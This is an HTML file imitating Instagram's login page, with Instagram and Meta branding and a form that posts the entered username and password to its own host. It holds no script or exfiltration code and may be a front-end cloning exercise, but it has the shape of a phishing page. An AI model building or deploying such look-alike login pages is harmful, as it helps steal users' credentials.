<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log in • Instagram</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>
    <div id="main">
        <h1>Instagram</h1>
        <form class="in" method="post" action="/">
            <input type="type" id="usr" name="name" placeholder="Phone number, username or email address">
            <input type="type" id="paswd" name="password" placeholder="Password">
            <button class="btn">Log in</button>
        </form>
        <br>
        <span id="or">OR</span>
        <header>
            <img src="fb.png" id="fb">
            <b>Log in with Facebook</b>
        </header>
        <h5>Forgotten your password?</h5>
    </div>
    <div id="main2">
        <div id="d">Don't have an account?<footer style="color: rgb(9, 111, 235);"><b>Sign up</b></footer>
        </div>
    </div>
    <span id="gta">Get the app.</span>
    <img src="ig.png" id="ig">
    <p id="p1">Meta &nbsp;&nbsp;&nbsp; About &nbsp;&nbsp;&nbsp; Blog &nbsp;&nbsp;&nbsp; Jobs &nbsp;&nbsp;&nbsp; Help
        &nbsp;&nbsp;&nbsp; API &nbsp;&nbsp;&nbsp; Privacy &nbsp;&nbsp;&nbsp; Terms &nbsp;&nbsp;&nbsp; Top accounts
        &nbsp;&nbsp;&nbsp; Hashtags &nbsp;&nbsp;&nbsp; Locations &nbsp;&nbsp;&nbsp; Instagram Lite &nbsp;&nbsp;&nbsp;
        Contact uploading and non-users</p>
    <p id="p2"><select name="Language" id="lang" default="English (UK)">
        <option value="English">English (UK)</option>
        <option value="Hindi">हिन्दी</option>
        <option value="Japnese">日本</option>
      </select>&nbsp;&nbsp; &copy; 2022 Instagram from Meta</p>
</body>
</html>